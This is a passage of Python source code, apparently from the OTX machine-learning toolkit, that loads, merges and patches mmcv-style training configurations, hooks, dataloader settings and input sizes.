Returns a dictionary containing the contents of the configuration file\n and a string representation of the configuration file.\n :raises: IOError if the file type is not supported.\n \"\"\"\n filename = osp.abspath(osp.expanduser(filename))\n check_file_exist(filename)\n extender = osp.splitext(filename)[1]\n if extender not in [\".py\", \".json\", \".yaml\", \".yml\"]:\n raise IOError(\"Only py/yml/yaml/json type are supported now!\")\n\n with tempfile.TemporaryDirectory() as temp_config_dir:\n with tempfile.NamedTemporaryFile(dir=temp_config_dir, suffix=extender) as temp_config_file:\n if platform.system() == \"Windows\":\n temp_config_file.close()\n temp_config_name = osp.basename(temp_config_file.name)\n # Substitute predefined variables\n if use_predefined_variables:\n Config._substitute_predefined_vars(filename, temp_config_file.name)\n else:\n shutil.copyfile(filename, temp_config_file.name)\n # Substitute base variables from placeholders to strings\n base_var_dict = Config._pre_substitute_base_vars(temp_config_file.name, temp_config_file.name)\n if filename.endswith(\".py\"):\n temp_module_name = osp.splitext(temp_config_name)[0]\n sys.path.insert(0, temp_config_dir)\n Config._validate_py_syntax(filename)\n mod = import_module(temp_module_name)\n sys.path.pop(0)\n cfg_dict = {name: value for name, value in mod.__dict__.items() if not name.startswith(\"__\")}\n # delete imported module\n del sys.modules[temp_module_name]\n elif filename.endswith((\".yml\", \".yaml\", \".json\")):\n import mmcv\n\n cfg_dict = mmcv.load(temp_config_file.name)\n\n # check deprecation information\n if DEPRECATION_KEY in cfg_dict:\n deprecation_info = cfg_dict.pop(DEPRECATION_KEY)\n warning_msg = f\"The config file {filename} will be deprecated \" \"in the future.\"\n if \"expected\" in deprecation_info:\n warning_msg += f' Please use {deprecation_info[\"expected\"]} ' \"instead.\"\n if \"reference\" in deprecation_info:\n warning_msg += \" More information can be found at \" f'{deprecation_info[\"reference\"]}'\n warnings.warn(warning_msg)\n\n cfg_text = filename + \"\\n\"\n with open(filename, \"r\", encoding=\"utf-8\") as f:\n # Setting encoding explicitly to resolve coding issue on windows\n cfg_text += f.read()\n\n if BASE_KEY in cfg_dict:\n cfg_dir = osp.dirname(filename)\n base_filename = cfg_dict.pop(BASE_KEY)\n base_filename = base_filename if isinstance(base_filename, list) else [base_filename]\n\n cfg_dict_list = []\n cfg_text_list = []\n for f in base_filename:\n _cfg_dict, _cfg_text = MPAConfig._file2dict(osp.join(cfg_dir, f))\n cfg_dict_list.append(_cfg_dict)\n cfg_text_list.append(_cfg_text)\n\n base_cfg_dict = dict()\n # for c in cfg_dict_list:\n # duplicate_keys = base_cfg_dict.keys() & c.keys()\n # if len(duplicate_keys) > 0:\n # raise KeyError('Duplicate key is not allowed among bases. 
'\n # f'Duplicate keys: {duplicate_keys}')\n # base_cfg_dict.update(c)\n for c in cfg_dict_list:\n if len(base_cfg_dict.keys() & c.keys()) > 0:\n # raise KeyError(f'Duplicate key is not allowed among bases [{base_cfg_dict.keys() & c.keys()}]')\n logger.warning(f\"Duplicate key is detected among bases [{base_cfg_dict.keys() & c.keys()}]\")\n logger.debug(f\"base = {base_cfg_dict}, cfg = {c}\")\n base_cfg_dict = Config._merge_a_into_b(base_cfg_dict, c)\n logger.debug(f\"merged dict = {base_cfg_dict}\")\n else:\n base_cfg_dict.update(c)\n\n # Subtitute base variables from strings to their actual values\n cfg_dict = Config._substitute_base_vars(cfg_dict, base_var_dict, base_cfg_dict)\n\n base_cfg_dict = Config._merge_a_into_b(cfg_dict, base_cfg_dict)\n cfg_dict = base_cfg_dict\n\n # merge cfg_text\n cfg_text_list.append(cfg_text)\n cfg_text = \"\\n\".join(cfg_text_list)\n\n return cfg_dict, cfg_text\n\n @staticmethod\n def fromfile(filename, use_predefined_variables=True, import_custom_modules=True):\n \"\"\"Static method that loads a configuration file and returns an instance of `Config` class.\n\n :param filename: str, the path of the configuration file to be loaded.\n :param use_predefined_variables: bool, a flag indicating whether to substitute predefined variables in the\n configuration file.\n :param import_custom_modules: bool, a flag indicating whether to import custom modules.\n :return: Config object, an instance of `Config` class containing the contents of the configuration file.\n \"\"\"\n cfg_dict, cfg_text = MPAConfig._file2dict(filename, use_predefined_variables)\n if import_custom_modules and cfg_dict.get(\"custom_imports\", None):\n import_modules_from_strings(**cfg_dict[\"custom_imports\"])\n return MPAConfig(cfg_dict, cfg_text=cfg_text, filename=filename)\n\n @property\n def pretty_text(self):\n \"\"\"Make python file human-readable.\n\n It's almost same as mmcv.Config's code but code to reformat using yapf is removed to reduce time.\n \"\"\"\n\n indent = 4\n\n def _indent(s_, num_spaces):\n s = s_.split(\"\\n\")\n if len(s) == 1:\n return s_\n first = s.pop(0)\n s = [(num_spaces * \" \") + line for line in s]\n s = \"\\n\".join(s)\n s = first + \"\\n\" + s\n return s\n\n def _format_basic_types(k, v, use_mapping=False):\n if isinstance(v, str):\n v_str = f\"'{v}'\"\n else:\n v_str = str(v)\n\n if use_mapping:\n k_str = f\"'{k}'\" if isinstance(k, str) else str(k)\n attr_str = f\"{k_str}: {v_str}\"\n else:\n attr_str = f\"{str(k)}={v_str}\"\n attr_str = _indent(attr_str, indent)\n\n return attr_str\n\n def _format_list(k, v, use_mapping=False):\n # check if all items in the list are dict\n if all(isinstance(_, dict) for _ in v):\n v_str = \"[\\n\"\n v_str += \"\\n\".join(f\"dict({_indent(_format_dict(v_), indent)}),\" for v_ in v).rstrip(\",\")\n if use_mapping:\n k_str = f\"'{k}'\" if isinstance(k, str) else str(k)\n attr_str = f\"{k_str}: {v_str}\"\n else:\n attr_str = f\"{str(k)}={v_str}\"\n attr_str = _indent(attr_str, indent) + \"]\"\n else:\n attr_str = _format_basic_types(k, v, use_mapping)\n return attr_str\n\n def _contain_invalid_identifier(dict_str):\n contain_invalid_identifier = False\n for key_name in dict_str:\n contain_invalid_identifier |= not str(key_name).isidentifier()\n return contain_invalid_identifier\n\n def _format_dict(input_dict, outest_level=False):\n r = \"\"\n s = []\n\n use_mapping = _contain_invalid_identifier(input_dict)\n if use_mapping:\n r += \"{\"\n for idx, (k, v) in enumerate(input_dict.items()):\n is_last = idx >= len(input_dict) - 1\n 
end = \"\" if outest_level or is_last else \",\"\n if isinstance(v, dict):\n v_str = \"\\n\" + _format_dict(v)\n if use_mapping:\n k_str = f\"'{k}'\" if isinstance(k, str) else str(k)\n attr_str = f\"{k_str}: dict({v_str}\"\n else:\n attr_str = f\"{str(k)}=dict({v_str}\"\n attr_str = _indent(attr_str, indent) + \")\" + end\n elif isinstance(v, list):\n attr_str = _format_list(k, v, use_mapping) + end\n else:\n attr_str = _format_basic_types(k, v, use_mapping) + end\n\n s.append(attr_str)\n r += \"\\n\".join(s)\n if use_mapping:\n r += \"}\"\n return r\n\n cfg_dict = self._cfg_dict.to_dict()\n text = _format_dict(cfg_dict, outest_level=True)\n\n return text\n\n\ndef copy_config(cfg):\n \"\"\"A function that creates a deep copy of the input configuration object.\n\n :param cfg: Config object, an instance of `Config` class to be copied.\n :return: Config object, a deep copy of the input configuration object.\n :raises: ValueError if the input object is not an instance of `Config` class.\n \"\"\"\n if not isinstance(cfg, Config):\n raise ValueError(f\"cannot copy this instance {type(cfg)}\")\n\n # disable [B301, B403] pickle, import-pickle - the library used for converting cfg object\n import pickle # nosec B403\n\n data = pickle.dumps(cfg)\n return pickle.loads(data) # nosec B301\n\n\ndef update_or_add_custom_hook(cfg: Config, hook_cfg: ConfigDict):\n \"\"\"Update hook cfg if same type is in custom_hook or append it.\"\"\"\n custom_hooks = cfg.get(\"custom_hooks\", [])\n custom_hooks_updated = False\n for custom_hook in custom_hooks:\n if custom_hook[\"type\"] == hook_cfg[\"type\"]:\n custom_hook.update(hook_cfg)\n custom_hooks_updated = True\n break\n if not custom_hooks_updated:\n custom_hooks.append(hook_cfg)\n cfg[\"custom_hooks\"] = custom_hooks\n\n\ndef remove_custom_hook(cfg: Config, hook_type: str):\n \"\"\"Remove hook cfg if hook_type is in custom_hook.\"\"\"\n custom_hooks = cfg.get(\"custom_hooks\", [])\n if len(custom_hooks) > 0:\n idx_to_del = None\n for i, custom_hook in enumerate(custom_hooks):\n if custom_hook[\"type\"] == hook_type:\n idx_to_del = i\n break\n if idx_to_del is not None:\n del custom_hooks[idx_to_del]\n\n\ndef recursively_update_cfg(\n cfg: Union[Config, dict],\n criterion: Callable[[Any, Any], bool],\n update_dict: Any,\n):\n \"\"\"A function that recursively updates the input dictionary or `Config` object with a new dictionary.\n\n :param cfg: Union[Config, dict], an input dictionary or `Config` object to be updated.\n :param criterion: Callable[[Any, Any], bool], a function that determines whether to update a key-value pair based on\n a criterion. 
The function takes two arguments: key and value, and returns a boolean.\n :param update_dict: Any, a dictionary to be used for updating the input dictionary.\n :return: None\n \"\"\"\n for key, val in list(cfg.items()):\n if isinstance(val, dict):\n recursively_update_cfg(val, criterion, update_dict)\n if criterion(key, val):\n cfg.update(update_dict)\n\n\ndef add_custom_hook_if_not_exists(cfg: Config, hook_cfg: ConfigDict):\n \"\"\"A function that adds a custom hook to the input `Config` object if it doesn't already exist.\n\n :param cfg: Config object, an instance of `Config` class to which the custom hook will be added.\n :param hook_cfg: ConfigDict object, an instance of `ConfigDict` class representing the custom hook to be added.\n :return: None\n \"\"\"\n custom_hooks = cfg.get(\"custom_hooks\", [])\n found = False\n for hook in custom_hooks:\n if hook[\"type\"] == hook_cfg[\"type\"]:\n found = True\n break\n if not found:\n custom_hooks.append(hook_cfg)\n cfg[\"custom_hooks\"] = custom_hooks\n\n\ndef remove_from_config(config: Union[Config, ConfigDict], key: str):\n \"\"\"Update & Remove configs.\"\"\"\n if key in config:\n if isinstance(config, Config):\n del config._cfg_dict[key] # pylint: disable=protected-access\n elif isinstance(config, ConfigDict):\n del config[key]\n else:\n raise ValueError(f\"Unknown config type {type(config)}\")\n\n\ndef remove_from_configs_by_type(configs: List[ConfigDict], type_name: str):\n \"\"\"Update & remove by type.\"\"\"\n indices = []\n for i, config in enumerate(configs):\n type_name_ = config.get(\"type\", None)\n if type_name_ == type_name:\n indices.append(i)\n for i in reversed(indices):\n configs.pop(i)\n\n\ndef update_config(\n config: Union[Config, ConfigDict],\n pairs: Dict[Tuple[Any, ...], Any],\n):\n \"\"\"Update configs by path as a key and value as a target.\"\"\"\n for path, value in pairs.items():\n path_ = list(reversed(path))\n ptr = config\n key = None\n while path_:\n key = path_.pop()\n if isinstance(ptr, (Config, Mapping)):\n if key not in ptr:\n ptr[key] = ConfigDict()\n elif isinstance(ptr, (list, tuple)):\n assert isinstance(key, int), f\"{key} of {path} must be int for ({type(ptr)}: {ptr})\"\n assert len(ptr) < key, f\"{key} of {path} exceeds {len(ptr)}\"\n if len(path_) == 0:\n ptr[key] = value\n ptr = ptr[key]\n\n\ndef get_dataset_configs(config: Union[Config, ConfigDict], subset: str) -> List[ConfigDict]:\n \"\"\"A function that retrieves 'datasets' configurations from the input `Config` object or `ConfigDict` object.\n\n :param config: Union[Config, ConfigDict], an instance of `Config` class or `ConfigDict` class containing the\n configurations.\n :param subset: str, a string representing the subset for which the 'datasets' configuration is required.\n :return: List[ConfigDict], a list of 'datasets' configuration dictionaries.\n \"\"\"\n if config.data.get(subset, None) is None:\n return []\n data_cfg = config.data[subset]\n data_cfgs = get_configs_by_keys(data_cfg, [\"dataset\", \"datasets\"])\n return data_cfgs if data_cfgs else [data_cfg]\n\n\ndef prepare_for_testing(config: Union[Config, ConfigDict], dataset: DatasetEntity) -> Config:\n \"\"\"Prepare configs for testing phase.\"\"\"\n config = copy.deepcopy(config)\n # FIXME. 
Should working directories be modified here?\n config.data.test.otx_dataset = dataset\n return config\n\n\ndef is_epoch_based_runner(runner_config: ConfigDict):\n \"\"\"Check Epoch based or Iter based runner.\"\"\"\n return \"Epoch\" in runner_config.type\n\n\ndef config_from_string(config_string: str) -> Config:\n \"\"\"Generate an mmcv config dict object from a string.\n\n :param config_string: string to parse\n :return config: configuration object\n \"\"\"\n with tempfile.NamedTemporaryFile(\"w\", suffix=\".py\") as temp_file:\n temp_file.write(config_string)\n temp_file.flush()\n return Config.fromfile(temp_file.name)\n\n\ndef patch_data_pipeline(config: Config, data_pipeline: str = \"\"):\n \"\"\"Replace data pipeline to data_pipeline.py if it exist.\"\"\"\n if os.path.isfile(data_pipeline):\n data_pipeline_cfg = Config.fromfile(data_pipeline)\n config.merge_from_dict(data_pipeline_cfg)\n else:\n raise FileNotFoundError(f\"data_pipeline: {data_pipeline} not founded\")\n\n\ndef patch_color_conversion(config: Config):\n \"\"\"Patch color conversion.\"\"\"\n assert \"data\" in config\n\n for cfg in get_configs_by_pairs(config.data, dict(type=\"Normalize\")):\n to_rgb = False\n if \"to_rgb\" in cfg:\n to_rgb = cfg.to_rgb\n cfg.to_rgb = not bool(to_rgb)\n\n\ndef patch_adaptive_interval_training(config: Config):\n \"\"\"Update adaptive interval settings for OTX training.\n\n This function can be removed by adding custom hook cfg into recipe.py directly.\n \"\"\"\n # Add/remove adaptive interval hook\n if config.get(\"use_adaptive_interval\", False):\n update_or_add_custom_hook(\n config,\n ConfigDict(\n {\n \"type\": \"AdaptiveTrainSchedulingHook\",\n \"max_interval\": 5,\n \"enable_adaptive_interval_hook\": True,\n \"enable_eval_before_run\": True,\n **config.pop(\"adaptive_validation_interval\", {}),\n }\n ),\n )\n else:\n config.pop(\"adaptive_validation_interval\", None)\n\n\ndef patch_early_stopping(config: Config):\n \"\"\"Update early stop settings for OTX training.\n\n This function can be removed by adding custom hook cfg into recipe.py directly.\n \"\"\"\n if \"early_stop\" in config:\n remove_custom_hook(config, \"EarlyStoppingHook\")\n early_stop = config.get(\"early_stop\", False)\n if early_stop:\n early_stop_hook = ConfigDict(\n type=\"LazyEarlyStoppingHook\",\n start=early_stop.start,\n patience=early_stop.patience,\n iteration_patience=early_stop.iteration_patience,\n interval=1,\n metric=config.early_stop_metric,\n priority=75,\n )\n update_or_add_custom_hook(config, early_stop_hook)\n else:\n remove_custom_hook(config, \"LazyEarlyStoppingHook\")\n\n # make sure model to be in a training mode even after model is evaluated (mmcv bug)\n update_or_add_custom_hook(\n config,\n ConfigDict(type=\"ForceTrainModeHook\", priority=\"LOWEST\"),\n )\n\n\ndef patch_persistent_workers(config: Config):\n \"\"\"Set persistent_workers as False in some conditions.\n\n persistent_workers is set as 0 in two cases below:\n case 1) num_workers is 0\n case 2) semi-SL with distributed training. 
Because it uses two data loaders in each processes,\n it makes workers for data loaders unstable, which makes errors during training.\n\n \"\"\"\n dist_semi_sl = \"unlabeled\" in config.data and torch.distributed.is_initialized()\n data_cfg = config.data\n for subset in [\"train\", \"val\", \"test\", \"unlabeled\"]:\n if subset not in data_cfg:\n continue\n dataloader_cfg = data_cfg.get(f\"{subset}_dataloader\", ConfigDict())\n workers_per_gpu = dataloader_cfg.get(\n \"workers_per_gpu\",\n data_cfg.get(\"workers_per_gpu\", 0),\n )\n if workers_per_gpu == 0 or dist_semi_sl:\n dataloader_cfg[\"persistent_workers\"] = False\n elif \"persistent_workers\" not in dataloader_cfg:\n dataloader_cfg[\"persistent_workers\"] = True\n\n if \"pin_memory\" not in dataloader_cfg:\n dataloader_cfg[\"pin_memory\"] = True\n\n data_cfg[f\"{subset}_dataloader\"] = dataloader_cfg\n\n\ndef get_adaptive_num_workers(num_dataloader: int = 1) -> Union[int, None]:\n \"\"\"Measure appropriate num_workers value and return it.\"\"\"\n num_gpus = torch.cuda.device_count()\n if num_gpus == 0:\n logger.warning(\"There is no GPUs. Use existing num_worker value.\")\n return None\n return min(multiprocessing.cpu_count() // (num_dataloader * num_gpus), 8) # max available num_workers is 8\n\n\ndef patch_from_hyperparams(config: Config, hyperparams):\n \"\"\"Patch config parameters from hyperparams.\"\"\"\n params = hyperparams.learning_parameters\n warmup_iters = int(params.learning_rate_warmup_iters)\n\n model_label_type = config.filename.split(\"/\")[-1]\n if \"multilabel\" in model_label_type:\n lr_config = ConfigDict(max_lr=params.learning_rate, warmup=None)\n else:\n lr_config = (\n ConfigDict(warmup_iters=warmup_iters)\n if warmup_iters > 0\n else ConfigDict(warmup_iters=warmup_iters, warmup=None)\n )\n\n if params.enable_early_stopping and config.get(\"evaluation\", None):\n early_stop = ConfigDict(\n start=int(params.early_stop_start),\n patience=int(params.early_stop_patience),\n iteration_patience=int(params.early_stop_iteration_patience),\n )\n else:\n early_stop = False\n\n runner = ConfigDict(max_epochs=int(params.num_iters))\n if config.get(\"runner\", None) and config.runner.get(\"type\").startswith(\"IterBasedRunner\"):\n runner = ConfigDict(max_iters=int(params.num_iters))\n\n hparams = ConfigDict(\n optimizer=ConfigDict(lr=params.learning_rate),\n lr_config=lr_config,\n early_stop=early_stop,\n data=ConfigDict(\n samples_per_gpu=int(params.batch_size),\n workers_per_gpu=int(params.num_workers),\n ),\n runner=runner,\n )\n\n # NOTE: Not all algorithms are compatible with the parameter `inference_batch_size`,\n # as `samples_per_gpu might` not be a valid argument for certain algorithms.\n if hasattr(config, \"task\"):\n if config.task == \"instance-segmentation\" or config.task == \"detection\":\n hparams.update(\n ConfigDict(\n data=ConfigDict(\n val_dataloader=ConfigDict(samples_per_gpu=int(params.inference_batch_size)),\n test_dataloader=ConfigDict(samples_per_gpu=int(params.inference_batch_size)),\n ),\n )\n )\n is_semi_sl = hyperparams.algo_backend.train_type.name == \"Semisupervised\"\n\n if hyperparams.learning_parameters.auto_num_workers:\n adapted_num_worker = get_adaptive_num_workers(2 if is_semi_sl else 1)\n if adapted_num_worker is not None:\n hparams.data.workers_per_gpu = adapted_num_worker\n\n if is_semi_sl:\n unlabeled_config = ConfigDict(\n data=ConfigDict(\n unlabeled_dataloader=ConfigDict(\n samples_per_gpu=int(params.unlabeled_batch_size),\n workers_per_gpu=int(params.num_workers),\n )\n )\n 
)\n config.update(unlabeled_config)\n\n hparams[\"use_adaptive_interval\"] = hyperparams.learning_parameters.use_adaptive_interval\n config.merge_from_dict(hparams)\n\n\nDEFAULT_META_KEYS = (\n \"filename\",\n \"ori_filename\",\n \"ori_shape\",\n \"img_shape\",\n \"pad_shape\",\n \"scale_factor\",\n \"flip\",\n \"flip_direction\",\n \"img_norm_cfg\",\n)\n\n\ndef get_meta_keys(pipeline_step, add_meta_keys: List[str] = []):\n \"\"\"Update meta_keys for ignore_labels.\"\"\"\n meta_keys = list(pipeline_step.get(\"meta_keys\", DEFAULT_META_KEYS))\n meta_keys.append(\"ignored_labels\")\n meta_keys += add_meta_keys\n pipeline_step[\"meta_keys\"] = set(meta_keys)\n return pipeline_step\n\n\ndef prepare_work_dir(config: Union[Config, ConfigDict]) -> str:\n \"\"\"Prepare configs of working directory.\"\"\"\n base_work_dir = config.work_dir\n checkpoint_dirs = glob.glob(os.path.join(base_work_dir, \"checkpoints_round_*\"))\n train_round_checkpoint_dir = os.path.join(base_work_dir, f\"checkpoints_round_{len(checkpoint_dirs)}\")\n os.makedirs(train_round_checkpoint_dir)\n config.work_dir = train_round_checkpoint_dir\n if \"meta\" not in config.runner:\n config.runner.meta = ConfigDict()\n config.runner.meta.exp_name = f\"train_round_{len(checkpoint_dirs)}\"\n return train_round_checkpoint_dir\n\n\ndef get_data_cfg(config: Union[Config, ConfigDict], subset: str = \"train\") -> Config:\n \"\"\"Return dataset configs.\"\"\"\n data_cfg = config.data[subset]\n while \"dataset\" in data_cfg:\n data_cfg = data_cfg.dataset\n return data_cfg\n\n\nclass InputSizeManager:\n \"\"\"Class for changing input size and getting input size value by checking data pipeline.\n\n NOTE: \"resize\", \"pad\", \"crop\", \"mosaic\", \"randomaffine\", \"multiscaleflipaug\" , \"AutoAugment\" and \"TwoCropTransform\"\n are considered at now. If other data pipelines exist, it can work differently than expected.\n\n Args:\n data_config (Dict): Data configuration expected to have \"train\", \"val\" or \"test\" data pipeline.\n base_input_size (Optional[Union[int, List[int], Dict[str, Union[int, List[int]]]]], optional):\n Default input size. If it's a None, it's estimated based on data pipeline. If it's an integer,\n it's expected that all data pipeline have (base_input_size x base_input_size) input size.\n If it's an integer list, all data pipeline have same (base_input_size[0] x base_input_size[1]) input size.\n If it's dictionary, each data pipeline has specified input size. 
It should have format as below:\n {\"train\" : [w, h], \"val\" : [w, h], \"test\" : [w, h]}\n \"\"\"\n\n PIPELINE_TO_CHANGE: Dict[str, List[str]] = {\n \"resize\": [\"size\", \"img_scale\"],\n \"pad\": [\"size\"],\n \"crop\": [\"crop_size\"],\n \"mosaic\": [\"img_scale\"],\n \"randomaffine\": [\"border\"],\n \"multiscaleflipaug\": [\"img_scale\"],\n }\n PIPELINE_WRAPPER: Dict[str, List[str]] = {\n \"MultiScaleFlipAug\": [\"transforms\"],\n \"AutoAugment\": [\"policies\"],\n \"TwoCropTransform\": [\"view0\", \"view1\", \"pipeline\"],\n \"LoadResizeDataFromOTXDataset\": [\"resize_cfg\"],\n }\n SUBSET_TYPES: Tuple[str, str, str, str] = (\"train\", \"val\", \"test\", \"unlabeled\")\n\n def __init__(\n self,\n data_config: Dict,\n base_input_size: Optional[Union[int, Tuple[int, int], Dict[str, int], Dict[str, Tuple[int, int]]]] = None,\n ):\n self._data_config = data_config\n if isinstance(base_input_size, int):\n base_input_size = (base_input_size, base_input_size)\n elif isinstance(base_input_size, dict):\n for task in base_input_size.keys():\n if isinstance(base_input_size[task], int):\n base_input_size[task] = (base_input_size[task], base_input_size[task]) # type: ignore[assignment]\n for subset_type in self.SUBSET_TYPES:\n if subset_type in data_config and subset_type not in base_input_size:\n raise ValueError(\n f\"There is {subset_type} data configuration but base input size for it doesn't exists.\"\n )\n\n self._base_input_size = base_input_size\n\n def set_input_size(self, input_size: Union[int, List[int], Tuple[int, int]]):\n \"\"\"Set input size in data pipe line.\n\n Args:\n input_size (Union[int, List[int]]):\n input size to set. If it's an integer, (input_size x input_size) will be set.\n If input_size is an integer list, (input_size[0] x input_size[1]) will be set.\n \"\"\"\n if isinstance(input_size, int):\n input_size = [input_size, input_size]\n if not isinstance(self.base_input_size, dict):\n resize_ratio = (input_size[0] / self.base_input_size[0], input_size[1] / self.base_input_size[1])\n\n # scale size values\n for subset_type in self.SUBSET_TYPES:\n if subset_type in self._data_config:\n if isinstance(self.base_input_size, dict):\n resize_ratio = (\n input_size[0] / self.base_input_size[subset_type][0],\n input_size[1] / self.base_input_size[subset_type][1],\n )\n pipelines = self._get_pipelines(subset_type)\n for pipeline in pipelines:\n self._set_pipeline_size_value(pipeline, resize_ratio)\n\n @property\n def base_input_size(self) -> Union[Tuple[int, int], Dict[str, Tuple[int, int]]]:\n \"\"\"Getter function of `base_input_size` attirbute.\n\n If it isn't set when intializing class, it's estimated by checking data pipeline.\n Same value is returned after estimation.\n\n Raises:\n RuntimeError: If failed to estimate base input size from data pipeline, raise an error.\n\n Returns:\n Union[List[int], Dict[str, List[int]]]: Base input size.\n \"\"\"\n if self._base_input_size is not None:\n return self._base_input_size # type: ignore[return-value]\n\n input_size = self.get_input_size_from_cfg()\n if input_size is None:\n raise RuntimeError(\"There isn't any pipeline in the data configurations.\")\n\n self._base_input_size = input_size\n return input_size\n\n def get_input_size_from_cfg(\n self, subset: Union[str, List[str]] = [\"test\", \"val\", \"train\"]\n ) -> Union[None, Tuple[int, int]]:\n \"\"\"Estimate image size using data pipeline.\n\n Args:\n subset (Union[str, List[str]], optional): Which pipelines to check. 
Defaults to [\"test\", \"val\", \"train\"].\n\n Returns:\n Union[None, List[int]]: Return estimiated input size. If failed to estimate, return None.\n \"\"\"\n if isinstance(subset, str):\n subset = [subset]\n\n for target_subset in subset:\n if target_subset in self._data_config:\n input_size = self._estimate_post_img_size(self._data_config[target_subset][\"pipeline\"])\n if input_size is not None:\n return tuple(input_size) # type: ignore[return-value]\n\n return None\n\n def _estimate_post_img_size(\n self, pipelines: List[Dict], default_size: Optional[List[int]] = None\n ) -> Union[List[int], None]:\n # NOTE: Mosaic isn't considered in this step because Mosaic and following RandomAffine don't change image size\n post_img_size = default_size\n for pipeline in pipelines:\n if \"resize\" in pipeline[\"type\"].lower():\n img_size = self._get_size_value(pipeline, \"resize\")\n if img_size is not None:\n post_img_size = img_size\n elif \"pad\" in pipeline[\"type\"].lower():\n img_size = self._get_size_value(pipeline, \"pad\")\n if img_size is not None:\n if post_img_size is None:\n post_img_size = img_size\n else:\n for i in range(2):\n if post_img_size[i] < img_size[i]:\n post_img_size[i] = img_size[i]\n elif \"crop\" in pipeline[\"type\"].lower():\n img_size = self._get_size_value(pipeline, \"crop\")\n if img_size is not None:\n if post_img_size is None:\n post_img_size = img_size\n else:\n for i in range(2):\n if post_img_size[i] > img_size[i]:\n post_img_size[i] = img_size[i]\n elif pipeline[\"type\"] == \"MultiScaleFlipAug\":\n img_size = self._get_size_value(pipeline, \"multiscaleflipaug\")\n if img_size is not None:\n post_img_size = img_size\n\n for pipeline_name, sub_pipeline_names in self.PIPELINE_WRAPPER.items():\n if pipeline_name == pipeline[\"type\"]:\n for sub_pipeline_name in sub_pipeline_names:\n if sub_pipeline_name in pipeline:\n sub_pipeline = pipeline[sub_pipeline_name]\n if isinstance(sub_pipeline, dict):\n sub_pipeline = [sub_pipeline]\n elif isinstance(sub_pipeline[0], list):\n sub_pipeline = sub_pipeline[0]\n post_img_size = self._estimate_post_img_size(sub_pipeline, post_img_size)\n break\n\n return post_img_size\n\n @classmethod\n def _get_size_value(cls, pipeline: Dict, attr: str) -> Union[List[int], None]:\n for pipeline_attr in cls.PIPELINE_TO_CHANGE[attr]:\n if pipeline_attr not in pipeline:\n continue\n size_val = pipeline[pipeline_attr]\n if isinstance(size_val, int):\n return [size_val, size_val]\n elif isinstance(size_val, tuple):\n return list(size_val)\n elif isinstance(size_val, list):\n return list(size_val[0])\n\n return None\n\n def _get_pipelines(self, subset_type: str):\n if \"pipeline\" in self._data_config[subset_type]:\n return self._data_config[subset_type][\"pipeline\"]\n if \"dataset\" in self._data_config[subset_type]:\n return self._data_config[subset_type][\"dataset\"][\"pipeline\"]\n raise RuntimeError(\"Failed to find pipeline.\")\n\n def _set_pipeline_size_value(self, pipeline: Dict, scale: Tuple[Union[int, float], Union[int, float]]):\n updated = False\n for pipeline_name, pipeline_attrs in self.PIPELINE_TO_CHANGE.items():\n if pipeline_name in pipeline[\"type\"].lower():\n for pipeline_attr in pipeline_attrs:\n if pipeline_attr in pipeline:\n self._set_size_value(pipeline, pipeline_attr, scale)\n updated = True\n if updated:\n break\n\n for pipeline_name, sub_pipeline_names in self.PIPELINE_WRAPPER.items():\n if pipeline_name == pipeline[\"type\"]:\n for sub_pipeline_name in sub_pipeline_names:\n if sub_pipeline_name in pipeline:\n if 
isinstance(pipeline[sub_pipeline_name], dict):\n self._set_pipeline_size_value(pipeline[sub_pipeline_name], scale)\n elif isinstance(pipeline[sub_pipeline_name][0], dict):\n for sub_pipeline in pipeline[sub_pipeline_name]:\n self._set_pipeline_size_value(sub_pipeline, scale)\n elif isinstance(pipeline[sub_pipeline_name][0], list):\n for sub_pipelines in pipeline[sub_pipeline_name]:\n for sub_pipeline in sub_pipelines:\n self._set_pipeline_size_value(sub_pipeline, scale)\n else:\n raise ValueError(\n \"Dataset pipeline in pipeline wrapper type should be\"\n \"either dict, list[dict] or list[list[dict]].\"\n )\n\n @staticmethod\n def _set_size_value(pipeline: Dict, attr: str, scale: Tuple[Union[int, float], Union[int, float]]):\n if isinstance(pipeline[attr], int):\n pipeline[attr] = round(pipeline[attr] * scale[0])\n elif isinstance(pipeline[attr], list) and isinstance(pipeline[attr][0], tuple):\n for idx in range(len(pipeline[attr])):\n pipeline[attr][idx] = (\n round(pipeline[attr][idx][0] * scale[0]),\n round(pipeline[attr][idx][1] * scale[1]),\n )\n else:\n pipeline[attr] = (round(pipeline[attr][0] * scale[0]), round(pipeline[attr][1] * scale[1]))\n\n\ndef get_configured_input_size(\n input_size_config: InputSizePreset = InputSizePreset.DEFAULT, model_ckpt: Optional[str] = None\n) -> Union[None, Tuple[int, int]]:\n \"\"\"Get configurable input size configuration. If it doesn't exist, return None.\n\n Args:\n input_size_config (InputSizePreset, optional): Input size configuration. Defaults to InputSizePreset.DEFAULT.\n model_ckpt (Optional[str], optional): Model weight to load. Defaults to None.\n\n Returns:\n Union[None, Tuple[int, int]]: Pair of width and height. If there is no input size configuration, return None.\n \"\"\"\n input_size = None\n if input_size_config == InputSizePreset.DEFAULT:\n if model_ckpt is None:\n return None\n\n model_info = torch.load(model_ckpt, map_location=\"cpu\")\n for key in [\"config\", \"learning_parameters\", \"input_size\", \"value\"]:\n if key not in model_info:\n return None\n model_info = model_info[key]\n input_size = model_info\n\n if input_size == InputSizePreset.DEFAULT.value:\n return None\n\n logger.info(\"Given model weight was trained with {} input size.\".format(input_size))\n else:\n input_size = input_size_config.value\n\n parsed_tocken = re.match(\"(\\\\d+)x(\\\\d+)\", input_size)\n return (int(parsed_tocken.group(1)), int(parsed_tocken.group(2)))\n","sub_path":"src/otx/algorithms/common/adapters/mmcv/utils/config_utils.py","file_name":"config_utils.py","file_ext":"py","file_size_in_byte":38489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
